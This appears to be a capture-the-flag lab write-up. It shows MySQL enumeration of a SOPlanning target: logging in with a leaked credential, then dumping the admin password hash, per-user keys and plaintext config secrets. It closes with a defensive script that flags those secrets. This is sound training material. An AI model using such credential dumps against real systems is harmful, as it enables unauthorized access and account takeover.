MySQL
Nmap discovered a MySQL server on the target, listening on port 3306.
The running service is MySQL 8.0.40-0ubuntu0.24.04.1.
No credentials are known at this time.
BitForgeAdmin Session
The DB credential has been leaked: BitForgeAdmin:B1tForG3S0ftw4r3S0lutions
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bitforge]
└─$ mysql -h $IP -u BitForgeAdmin -pB1tForG3S0ftw4r3S0lutions
ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bitforge]
└─$ mysql --skip-ssl -h $IP -u BitForgeAdmin -pB1tForG3S0ftw4r3S0lutions
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 116
Server version: 8.0.40-0ubuntu0.24.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
Session established. Note that --skip-ssl disables TLS entirely rather than trusting the self-signed chain, so the credential and every query cross the wire in cleartext.
MySQL [(none)]> show databases;
+----------------------+
| Database             |
+----------------------+
| bitforge_customer_db |
| information_schema   |
| performance_schema   |
| soplanning           |
+----------------------+
4 rows in set (0.023 sec)
It would appear that the current DB user has access to the databases of both the BitForge Solutions and SOPlanning web apps.
bitforge_customer_db DB
MySQL [(none)]> use bitforge_customer_db;
Database changed
MySQL [bitforge_customer_db]> show tables;
Empty set (1.663 sec)
The bitforge_customer_db DB is empty, as expected for a dummy site.
soplanning DB
MySQL [bitforge_customer_db]> use soplanning;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [soplanning]> show tables;
+----------------------------+
| Tables_in_soplanning       |
+----------------------------+
| planning_audit             |
| planning_config            |
| planning_ferie             |
| planning_groupe            |
| planning_lieu              |
| planning_periode           |
| planning_projet            |
| planning_projet_user_tarif |
| planning_ressource         |
| planning_right_on_user     |
| planning_status            |
| planning_user              |
| planning_user_groupe       |
+----------------------------+
13 rows in set (0.026 sec)
planning_user Table
MySQL [soplanning]> SELECT login,password,cle FROM planning_user;
+-------+------------------------------------------+----------------------------------+
| login | password                                 | cle                              |
+-------+------------------------------------------+----------------------------------+
| admin | 77ba9273d4bcfa9387ae8652377f4c189e5a47ee | dbee8fd60fd4244695084bd84a996882 |
| NULL  | NULL                                     | 181ba036234dcccd78a2c7f540928a0f |
| NULL  | NULL                                     | bdcf6ee6918de4347aa34b7b533119d9 |
| NULL  | NULL                                     | cb284acc53164275d8cbb61fb090daf8 |
| NULL  | NULL                                     | 2eb523102046905d137e264e1eda0a43 |
+-------+------------------------------------------+----------------------------------+
5 rows in set (0.023 sec)
Credential hash of the admin user identified: 77ba9273d4bcfa9387ae8652377f4c189e5a47ee (40 hex characters).
There is also an interesting column, cle (French for "key"), containing a 32-character hex string for the admin row: dbee8fd60fd4244695084bd84a996882. The four other rows have no login or password but still carry a cle value.
hashcat was unable to crack the password hash.
Vulnerabilities
Looking further into the presence of the unusual cle column turns up an article showcasing several SOPlanning vulnerabilities, including an authentication bypass.
planning_config Table
MySQL [soplanning]> SELECT * FROM planning_config;
+----------------------------------------+--------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------+
| cle | valeur | commentaire |
+----------------------------------------+--------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------+
| CONTACT_FORM_DEACTIVATE | | Put 1 to deactivate the display of the small button/popin (contact form) |
| CURRENT_VERSION | 1.52.01 | Internal key for auto upgrade control |
| DAYS_INCLUDED | 1,2,3,4,5 | Define the days included to count duration. IMPORTANT : 0=sunday, 1=monday, 2=tuesday, 3=wenesday, 4=thursday, 5=friday, 6=saturday |
| DEFAULT_NB_DAYS_DISPLAYED | 2 | Default number of days displayed in the planning view by day |
| DEFAULT_NB_MONTHS_DISPLAYED | 2 | Default number of months displayed in the planning |
| DEFAULT_NB_ROWS_DISPLAYED | 100 | Default number of rows displayed in the planning |
| DEFAULT_PERIOD_LINK | | Default value for link in a period |
| DURATION_AM | 04:00 | Morning duration when calculating worked hours |
| DURATION_DAY | 09:00 | Duration when only one day is selected |
| DURATION_PM | 05:00 | Afternoon duration when calculating worked hours |
| GOOGLE_2FA_ACTIVE | 0 | |
| GOOGLE_OAUTH_ACTIVE | 0 | |
| GOOGLE_OAUTH_CLIENT_ID | | |
| GOOGLE_OAUTH_CLIENT_SECRET | | |
| HOURS_DISPLAYED | 8,9,10,11,14,15,16,17 | List of hours displayed in the day view |
| LOGOUT_REDIRECT | | Optional redirect url after logout (for exemple to return on your own intranet). ex : http://www.google.com |
| NOTIFICATION_EMAIL_COCHE | 1 | Default state for notification checkbox in task form |
| PLANNING_AFFICHAGE_STATUS | aucun | Show status |
| PLANNING_CELL_FONTSIZE | 0 | Cell Font size |
| PLANNING_CODE_WIDTH | 5 | Code width |
| PLANNING_CODE_WIDTH_LARGE | 5 | Code width large mode |
| PLANNING_COL_WIDTH | 25 | Planning col width |
| PLANNING_COL_WIDTH_LARGE | 130 | Planning col width large mode |
| PLANNING_COULEUR_TACHE | 0 | Task Color |
| PLANNING_DATE_FORMAT | 1 | Date Format |
| PLANNING_DIFFERENCIE_TACHE_COMMENTAIRE | 0 | Task comment |
| PLANNING_DIFFERENCIE_TACHE_LIEN | 1 | Task link |
| PLANNING_DIFFERENCIE_TACHE_PARTIELLE | 1 | Half Task |
| PLANNING_DIFFERENCIE_WEEKEND | 1 | Week-end class activate |
| PLANNING_DUREE_CRENEAU_HORAIRE | 30 | Time duration |
| PLANNING_HIDE_WEEKEND_TASK | 0 | Hide weekend task |
| PLANNING_LINE_HEIGHT | | Default line height in the planning. If not specified, it fits the username height |
| PLANNING_MASQUER_FERIES | 0 | Hide holidays |
| PLANNING_ONE_ASSIGNMENT_MAX_PER_DAY | 0 | Option to display only one assignment/task per cell/day in the planning (put "1" to activite this option) |
| PLANNING_PAGES | 1,5,10,20,50,100 | rows per page in the planning |
| PLANNING_REPEAT_HEADER | 0 | If > 0, repeat header (days/months) in the planning each x lines |
| PLANNING_TEXTE_TACHES_LIEU | code_projet | Cell text location |
| PLANNING_TEXTE_TACHES_PERSONNE | code_projet | Cell text user |
| PLANNING_TEXTE_TACHES_PROJET | code_personne | Cell text project |
| PLANNING_TEXTE_TACHES_RESSOURCE | code_projet | Cell text resource |
| PROJECT_COLORS_POSSIBLE | | color choice limitation for planner (empty for no limit). Exemple :#ff0000,#aa8811,#446622 |
| REFRESH_TIMER | 600 | refresh time for the planning page (time in second) |
| SECURE_KEY | a5eaea3ccc1268f62d081460bb32fb67 | String used only for security matters |
| SEMAPHORE_ACTIVATED | 0 | Activated in order to avoid periode_id crossing when creating a lot of tasks at the same time |
| SMTP_FROM | notification@yourdomain.com | |
| SMTP_HOST | localhost | |
| SMTP_LOGIN | | |
| SMTP_PASSWORD | | |
| SMTP_PORT | | |
| SMTP_SECURE | | |
| SOPLANNING_API_KEY_NAME | SOPLANNING-API | |
| SOPLANNING_API_KEY_VALUE | 0b6038ad-d400-11ef-bf32-00505695ee43 | |
| SOPLANNING_LOGO | | Logo |
| SOPLANNING_OPTION_ACCES | 0 | Public access |
| SOPLANNING_OPTION_AUDIT | 1 | Audit module |
| SOPLANNING_OPTION_AUDIT_CONNEXIONS | 1 | Audit connexion |
| SOPLANNING_OPTION_AUDIT_EQUIPES | 1 | Audit team |
| SOPLANNING_OPTION_AUDIT_GROUPES | 1 | Audit project group |
| SOPLANNING_OPTION_AUDIT_LIEUX | 1 | Audit location |
| SOPLANNING_OPTION_AUDIT_PROJETS | 1 | Audit project |
| SOPLANNING_OPTION_AUDIT_RESSOURCES | 1 | Audit ressource |
| SOPLANNING_OPTION_AUDIT_RETENTION | 30 | Audit retention |
| SOPLANNING_OPTION_AUDIT_STATUTS | 1 | Audit status |
| SOPLANNING_OPTION_AUDIT_TACHES | 1 | Audit tasks |
| SOPLANNING_OPTION_AUDIT_UTILISATEURS | 1 | Audit users |
| SOPLANNING_OPTION_LIEUX | 1 | Location Option |
| SOPLANNING_OPTION_RESSOURCES | 1 | Ressource Option |
| SOPLANNING_OPTION_TACHES | 1 | Task Option |
| SOPLANNING_OPTION_VISITEUR | 0 | Visitor can add or update task |
| SOPLANNING_THEME | soplanning.css | Default theme |
| SOPLANNING_TITLE | SOPlanning | Change the title of Soplanning for integration in extranet |
| SOPLANNING_URL | | Your SOPlanning instance url, to be able to send email with links |
| TIMEZONE | Europe/Paris | Timezone |
+----------------------------------------+--------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------+
73 rows in set (0.026 sec)
Security-relevant values recovered from planning_config:
SECURE_KEY: a5eaea3ccc1268f62d081460bb32fb67
SOPLANNING_API_KEY_NAME: SOPLANNING-API
SOPLANNING_API_KEY_VALUE: 0b6038ad-d400-11ef-bf32-00505695ee43
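As an added example (not part of this writeup and not SOPlanning code), a small Python script that parses the mysql client's box-drawn output shown above and flags the planning_config rows a defender would triage first: secrets sitting in plaintext in a table readable by the application account, and the disabled 2FA toggle. The sample rows are a constructed four-row excerpt of the dump above; the set of keys treated as secrets is my own choice.

```python
# Constructed excerpt of the `SELECT * FROM planning_config` output above,
# in the same +---+ / | a | b | box format the mysql client prints.
SAMPLE_DUMP = """\
+--------------------------+--------------------------------------+---------------------------------------+
| cle                      | valeur                               | commentaire                           |
+--------------------------+--------------------------------------+---------------------------------------+
| GOOGLE_2FA_ACTIVE        | 0                                    |                                       |
| SECURE_KEY               | a5eaea3ccc1268f62d081460bb32fb67     | String used only for security matters |
| SMTP_PASSWORD            |                                      |                                       |
| SOPLANNING_API_KEY_VALUE | 0b6038ad-d400-11ef-bf32-00505695ee43 |                                       |
+--------------------------+--------------------------------------+---------------------------------------+
4 rows in set (0.026 sec)
"""

# Config keys whose valeur is a secret (assumption: chosen from the dump above;
# SOPlanning itself does not mark them as such).
SECRET_KEYS = {"SECURE_KEY", "SOPLANNING_API_KEY_VALUE", "SMTP_PASSWORD",
               "GOOGLE_OAUTH_CLIENT_SECRET"}


def parse_mysql_table(text):
    """Turn mysql-client box output into a list of {header: value} dicts.

    Only lines starting with '|' carry data; the first one is the header row.
    Separator lines (+---+) and the 'N rows in set' trailer are ignored.
    """
    rows = [line for line in text.splitlines() if line.startswith("|")]
    cells = [[c.strip() for c in row.strip().strip("|").split("|")] for row in rows]
    header, body = cells[0], cells[1:]
    return [dict(zip(header, r)) for r in body]


def audit_config(rows):
    """Return human-readable findings for parsed planning_config rows."""
    findings = []
    cfg = {r["cle"]: r["valeur"] for r in rows}
    # Non-empty secrets stored in the config table are readable by anyone
    # holding the application's DB credential, as happened in this writeup.
    for key in sorted(SECRET_KEYS & cfg.keys()):
        if cfg[key]:
            findings.append(f"{key}: secret stored in plaintext in planning_config")
    if cfg.get("GOOGLE_2FA_ACTIVE") == "0":
        findings.append("GOOGLE_2FA_ACTIVE=0: second factor disabled for web logins")
    return findings


if __name__ == "__main__":
    for finding in audit_config(parse_mysql_table(SAMPLE_DUMP)):
        print(finding)
```

To run it against a real dump, pipe the mysql client's output (or the saved transcript) into SAMPLE_DUMP's place; the parser does not depend on column widths.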